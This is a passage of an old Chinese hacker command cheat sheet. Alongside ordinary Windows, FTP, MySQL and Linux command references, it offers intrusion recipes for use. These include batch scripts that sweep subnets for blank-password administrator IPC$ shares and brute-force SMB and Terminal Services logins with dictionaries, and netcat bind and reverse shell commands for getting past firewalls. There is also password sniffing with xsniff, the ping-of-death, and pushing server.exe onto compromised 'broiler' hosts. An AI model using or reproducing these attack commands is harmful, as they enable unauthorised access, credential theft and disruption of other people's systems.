"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死*之ping(发送大于64K的文件并一直ping就成了死*之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 【2】 del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.*t two.*t > 3st.*t 对比二个文件并把不同之处输出到3st.*t文件中,"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下 cppy 1st.jpg/b+2st.*t/a 3st.jpg 将2st.*t的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.*t文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件(目录)的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量 set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序,并显示出:请按任意键继续.... if 在批处理程序中执行条件处理(更多说明见if命令及变量) goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息 echo 信息 >> pass.*t 将"信息"保存到pass.*t文件中 findstr "Hello" aa.*t 在aa.*t文件中寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) 【3】 ver 在DOS窗口下显示版本信息 winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS md 目录名 创建目录 replace 源文件 要替换文件的目录 替换文件 ren 原文件名 新文件名 重命名文件名 tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令=字符 doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名 为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.*t /D pub 设定d:\test.*t拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况 【4】 IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件 mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型 user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限 case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录的父目录 ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip 【5】 MYSQL 命令: mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 (例:mysql -h110.110.110.110 -Uroot -P123456 注:u与root可以不用加空格,其它也一样) exit 退出MYSQL mysql*** -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 use mysql; show tables; 显示库中的数据表 describe 表名; 显示数据表的结构 create database 库名; 建库 use 库名; create table 表名 (字段设定列表); 建表 drop database 库名; drop table 表名; 删库和删表 delete from 表名; 将表中记录清空 select * from 表名; 显示表中的记录 mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 win2003系统下新增命令(实用部份): shutdown /参数 关闭或重启本地或远程主机。 参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。 例:shutdown /r /t 0 立即重启本地主机(无延时) taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 【6】 Linux系统下基本命令: 要区分大小写 uname 显示版本信息(同win2K的 ver) dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) pwd 查询当前所在的目录位置 cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 cat 文件名 查看文件内容 cat >abc.*t 往abc.*t文件中写上内容。 more 文件名 以一页一页的方式显示一个文本文件。 cp 复制文件 mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录 mkdir 目录名 建立目录 rmdir 删除子目录,目录内没有文档。 chmod 设定档案或目录的存取权限 grep 在档案中查找字符串 diff 档案文件比较 find 档案搜寻 date 现在的日期、时间 who 查询目前和你使用同一台机器的人以及Login时间地点 w 查询目前上机者的详细资料 whoami 查看自己的帐号名称 groups 查看某人的Group passwd 更改密码 history 查看自己下过的命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用它来编译C语言写的文件 su 权限转换为指定使用者 telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ftp ftp连接上某服务器(同win2K) 【附】批处理命令与变量 1:for命令及变量 基本格式: FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。 批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3 (set):指定一个或一组文件,可使用通配符,如:(D:\user.*t)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 } command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 command_parameters:为特定命令指定参数或命令行开关 IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.*t)时 }。 用法举例: @echo off echo 用法格式:test.bat *.*.* > test.*t for /L %%G in (1 1 254) do echo %1.%%G >>test.*t & net use \\%1.%%G /user:***istrator | find "命令成功完成" >>test.*t 存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.*t中。 /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 @echo off echo 用法格式:ok.bat ip FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。http://www.jz5u.com 【7】 2:if命令及变量 基本格式: IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。 例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。 0 指发现并成功执行(真);1 指没有发现、没执行(假)。 IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。 例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ") IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。 例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.*t. <del test.*t.> else echo test.*t.missing ”,注意命令中的“.” (二)【系统外部命令(均需下载相关工具)】 1、瑞士军刀:nc.exe 参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行[危险] -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.*t 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.*t nc -L -p 80 < c:\honeyport.*t 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 本机上用:nc -l -p 本机端口 在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 备 注: | 管道命令 < 或 > 重定向命令。“<”,例如:tlntadmn < test.*t 指把test.*t的内容赋值给tlntadmn命令 @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.*t 意思是:后台执行dir,并把结果存在d:\log.*t中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。 如:@dir c:\winnt >> d:\log.*t和@dir c:\winnt > d:\log.*t二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。 【8】 2、扫锚工具:xscan.exe 基本格式 xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.*t -port -cgi -t 200,5 -v -o 检测“hostlist.*t”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机www.jz5u.com 【9】 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接(多线程) -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用-f后面的密码 -F 间隔时间(频率) -l 使用-l后面的用户名 -w 使用-w后面的密码字典 -p 使用-p后面的密码 -D 登录主页面 用法示例 tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的***istrator的登陆密码 tscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆192.168.0.1的***istrator用户 @if not exist ipcscan.*t goto noscan @for /f "tokens=1 delims= " %%i in (3389.*t) do call hack.bat %%i nscan @echo 3389.*t no find or scan faild (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.*t) 3389.bat意思是:从3389.*t文件中取一个IP,接着运行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l ***istrator -w pass.dic >>rouji.*t :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.*t、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) hack.bat意思是:运行tscrack.exe用字典暴破3389.*t中所有主机的***istrator密码,并将破解结果保存在rouji.*t文件中。 5、其它: Shutdown.exe Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。) fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙) fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息 Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。 OpenTelnet.exe (远程开启telnet工具) opentelnet.exe \\IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet \\ip 连接上对方。 NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。 ResumeTelnet.exe (OpenTelnet附带的另一个工具) resumetelnet.exe \\IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。 【10】 6、FTP命令详解: FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。 FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,其中 -v 显示远程服务器的所有响应信息; -n 限制ftp的自动登录,即不使用;.n etrc文件; -d 使用调试方式; -g 取消全局文件名。 FTP使用的内部命令如下(中括号表示可选项): 1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.$ macro-ame[args]: 执行宏定义macro-name。 3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。 4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。 5.ascii:使用ascii类型传输方式。 6.bell:每个命令执行完毕后计算机响铃一次。 7.bin:使用二进制文件传输方式。 8.bye:退出ftp会话过程。 9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 10.cd remote-dir:进入远程主机目录。 11.cdup:进入远程主机目录的父目录。 12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。 13.close:中断与远程服务器的ftp会话(与open对应)。 14.cr:使用asscii方式传输文件时,将回车换行转换为回行。 15.delete remote-file:删除远程主机文件。 16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。 17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。 18.disconnection:同close。 19.form format:将文件传输方式设置为format,缺省为file方式。 20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。 21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。 22.hash:每传输1024字节,显示一个hash符号(#)。 23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。 24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。 35.modtime file-name:显示远程主机文件的最后修改时间。 36.mput local-file:将多个文件传输至远程主机。 37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。 38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。 39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。 40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。 41.open host[port]:建立指定ftp服务器连接,可指定连接端口。 42.passive:进入被动传输方式。 43.prompt:设置多个文件传输时的交互提示。 44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。 45.put local-file[remote-file]:将本地文件local-file传送至远程主机。 46.pwd:显示远程主机的当前工作目录。 47.quit:同bye,退出ftp会话。 48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst. 49.recv remote-file[local-file]:同get。 50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。 51.rhelp[cmd-name]:请求获得远程主机的帮助。 52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。 53.rename[from][to]:更改远程主机文件名。 54.reset:清除回答队列。 55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。 56.rmdir dir-name:删除远程主机目录。 57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。 58.send local-file[remote-file]:同put。 59.sendport:设置PORT命令的使用。 60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。 61.size file-name:显示远程主机文件大小,如:site idle 7200。 62.status:显示当前ftp状态。www.jz5u.com 63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。 64.sunique:将远程主机文件名存储设置为只一(与runique对应)。 65.system:显示远程主机的操作系统类型。 66.tenex:将文件传输类型设置为TENEX机的所需的类型。 67.tick:设置传输时的字节计数器。 68.trace:设置包跟踪。 69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。 70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3 71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。 72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on. 73.?[cmd]:同help. 【11】 7:计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 mplayer2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 